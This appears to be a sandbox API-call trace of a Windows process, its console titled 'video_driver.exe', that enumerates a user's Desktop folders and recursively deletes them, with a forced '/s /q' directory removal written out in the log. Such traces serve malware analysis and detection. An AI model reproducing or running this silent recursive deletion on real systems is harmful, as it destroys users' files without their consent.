RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x76) returned 0x7c6688 [0069.922] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3eea6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj", lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="MFZCK7~1")) returned 0x7c62f8 [0069.922] FindClose (in: hFindFile=0x7c62f8 | out: hFindFile=0x7c62f8) returned 1 [0069.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\*", lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName=".", cAlternateFileName="")) returned 0x7c62f8 [0069.922] FindNextFileW (in: hFindFile=0x7c62f8, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="..", cAlternateFileName="")) returned 1 [0069.922] FindNextFileW (in: hFindFile=0x7c62f8, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="..", cAlternateFileName="")) returned 0 [0069.922] FindClose (in: hFindFile=0x7c62f8 | out: hFindFile=0x7c62f8) returned 1 [0069.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj", nBufferLength=0x4, lpBuffer=0x3ee538, lpFilePart=0x3ee530 | out: lpBuffer="", lpFilePart=0x3ee530*=0x0) returned 0x37 [0069.923] RemoveDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj")) returned 1 [0069.926] GetProcessHeap () returned 0x7b0000 [0069.926] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6688 | out: hHeap=0x7b0000) returned 1 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6260 | out: hHeap=0x7b0000) returned 1 [0069.927] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x40b55e0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x40b55e0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="moG2C7rzW", cAlternateFileName="")) returned 1 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c60a0, Size=0x90) returned 0x7c6260 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c6260) returned 0x90 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de3a8 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de3a8, Size=0x20) returned 0x7de3a8 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de3a8) returned 0x20 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de3d0 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de3d0, Size=0xec) returned 0x7de3d0 [0069.927] GetProcessHeap () returned 0x7b0000 [0069.927] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de3d0) returned 0xec [0069.927] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3eeea4 | out: _Buffer="\r\n") returned 2 [0069.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.928] GetFileType (hFile=0x7) returned 0x2 [0069.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3eee64 | out: lpMode=0x3eee64) returned 1 [0069.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3eee90, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3eee90*=0x2) returned 1 [0069.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.932] _vsnwprintf (in: _Buffer=0x4a415e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3eeea0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0069.932] _vsnwprintf (in: _Buffer=0x4a415e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3eeea0 | out: _Buffer=">") returned 1 [0069.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.932] GetFileType (hFile=0x7) returned 0x2 [0069.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3eee68 | out: lpMode=0x3eee68) returned 1 [0069.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a415e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3eee94, lpReserved=0x0 | out: lpBuffer=0x4a415e40*, lpNumberOfCharsWritten=0x3eee94*=0x26) returned 1 [0069.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.933] GetFileType (hFile=0x7) returned 0x2 [0069.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef0ec | out: lpMode=0x3ef0ec) returned 1 [0069.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.934] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7de3b0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ef118, lpReserved=0x0 | out: lpBuffer=0x7de3b0*, lpNumberOfCharsWritten=0x3ef118*=0x5) returned 1 [0069.934] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef124 | out: _Buffer=" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\" /s /q ") returned 57 [0069.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.934] GetFileType (hFile=0x7) returned 0x2 [0069.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef0e4 | out: lpMode=0x3ef0e4) returned 1 [0069.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x3ef110, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef110*=0x39) returned 1 [0069.936] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef144 | out: _Buffer="\r\n") returned 2 [0069.936] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.936] GetFileType (hFile=0x7) returned 0x2 [0069.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.936] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef104 | out: lpMode=0x3ef104) returned 1 [0069.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.937] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef130, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef130*=0x2) returned 1 [0069.937] GetConsoleTitleW (in: lpConsoleTitle=0x3eecb4, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.938] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xec) returned 0x7c62f8 [0069.938] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c62f8, Size=0x7e) returned 0x7c62f8 [0069.938] GetProcessHeap () returned 0x7b0000 [0069.938] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c62f8) returned 0x7e [0069.938] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x86) returned 0x7c6380 [0069.938] GetProcessHeap () returned 0x7b0000 [0069.938] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xec) returned 0x7c6410 [0069.938] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c6410, Size=0x7e) returned 0x7c6410 [0069.938] GetProcessHeap () returned 0x7b0000 [0069.938] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c6410) returned 0x7e [0069.938] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x68) returned 0x7c60a0 [0069.938] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x3eea6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW", lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x40b55e0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x40b55e0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="moG2C7rzW", cAlternateFileName="MOG2C7~1")) returned 0x7c6498 [0069.939] FindClose (in: hFindFile=0x7c6498 | out: hFindFile=0x7c6498) returned 1 [0069.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\*", lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x40b55e0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x40b55e0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName=".", cAlternateFileName="")) returned 0x7c6498 [0069.939] FindNextFileW (in: hFindFile=0x7c6498, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x40b55e0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x40b55e0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="..", cAlternateFileName="")) returned 1 [0069.939] FindNextFileW (in: hFindFile=0x7c6498, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="PYHaTu2SZet-4", cAlternateFileName="PYHATU~1")) returned 1 [0069.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHATU~1", lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="PYHaTu2SZet-4", cAlternateFileName="PYHATU~1")) returned 0x7c64d8 [0069.939] FindClose (in: hFindFile=0x7c64d8 | out: hFindFile=0x7c64d8) returned 1 [0069.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHATU~1\\*", lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7c64d8 [0069.940] FindNextFileW (in: hFindFile=0x7c64d8, lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.940] FindNextFileW (in: hFindFile=0x7c64d8, lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0069.940] FindClose (in: hFindFile=0x7c64d8 | out: hFindFile=0x7c64d8) returned 1 [0069.940] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHATU~1", nBufferLength=0x4, lpBuffer=0x3ee0a8, lpFilePart=0x3ee0a0 | out: lpBuffer="", lpFilePart=0x3ee0a0*=0x0) returned 0x39 [0069.940] RemoveDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHATU~1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu~1")) returned 1 [0069.943] FindNextFileW (in: hFindFile=0x7c6498, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="Vh5MbuS", cAlternateFileName="")) returned 1 [0069.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS", lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="Vh5MbuS", cAlternateFileName="")) returned 0x7c64d8 [0069.943] FindClose (in: hFindFile=0x7c64d8 | out: hFindFile=0x7c64d8) returned 1 [0069.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\*", lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7c64d8 [0069.943] FindNextFileW (in: hFindFile=0x7c64d8, lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.943] FindNextFileW (in: hFindFile=0x7c64d8, lpFindFileData=0x3ee0e4 | out: lpFindFileData=0x3ee0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0069.943] FindClose (in: hFindFile=0x7c64d8 | out: hFindFile=0x7c64d8) returned 1 [0069.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS", nBufferLength=0x4, lpBuffer=0x3ee0a8, lpFilePart=0x3ee0a0 | out: lpBuffer="", lpFilePart=0x3ee0a0*=0x0) returned 0x38 [0069.943] RemoveDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus")) returned 1 [0069.946] FindNextFileW (in: hFindFile=0x7c6498, lpFindFileData=0x3ee574 | out: lpFindFileData=0x3ee574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x779b140, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x779b140, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c6e36c, dwReserved1=0x77eb7a01, cFileName="Vh5MbuS", cAlternateFileName="")) returned 0 [0069.946] FindClose (in: hFindFile=0x7c6498 | out: hFindFile=0x7c6498) returned 1 [0069.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW", nBufferLength=0x4, lpBuffer=0x3ee538, lpFilePart=0x3ee530 | out: lpBuffer="", lpFilePart=0x3ee530*=0x0) returned 0x30 [0069.946] RemoveDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw")) returned 1 [0069.950] GetProcessHeap () returned 0x7b0000 [0069.950] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c60a0 | out: hHeap=0x7b0000) returned 1 [0069.950] GetProcessHeap () returned 0x7b0000 [0069.950] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6410 | out: hHeap=0x7b0000) returned 1 [0069.950] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="")) returned 1 [0069.950] GetProcessHeap () returned 0x7b0000 [0069.950] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c6260, Size=0xb0) returned 0x7c6410 [0069.950] GetProcessHeap () returned 0x7b0000 [0069.950] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c6410) returned 0xb0 [0069.950] FindNextFileW (in: hFindFile=0x7bf7e8, lpFindFileData=0x3ef190 | out: lpFindFileData=0x3ef190*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x7ca268, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="")) returned 0 [0069.950] GetLastError () returned 0x12 [0069.950] FindClose (in: hFindFile=0x7bf7e8 | out: hFindFile=0x7bf7e8) returned 1 [0069.950] GetProcessHeap () returned 0x7b0000 [0069.950] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5de0 | out: hHeap=0x7b0000) returned 1 [0069.950] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de4c8 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de4c8, Size=0xd0) returned 0x7de4c8 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de4c8) returned 0xd0 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de5a0 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de5a0, Size=0x2a8) returned 0x7de5a0 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de5a0) returned 0x2a8 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de850 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de850, Size=0x18) returned 0x7de850 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de850) returned 0x18 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de870 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de870, Size=0xd8) returned 0x7de870 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de870) returned 0xd8 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.951] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7de950 [0069.951] GetProcessHeap () returned 0x7b0000 [0069.952] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7de950, Size=0xb0) returned 0x7de950 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7de950) returned 0xb0 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7dea08 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7dea08, Size=0x20) returned 0x7dea08 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7dea08) returned 0x20 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7dea30 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7dea30, Size=0x38) returned 0x7dea30 [0069.952] GetProcessHeap () returned 0x7b0000 [0069.952] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7dea30) returned 0x38 [0069.952] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef2f4 | out: _Buffer="\r\n") returned 2 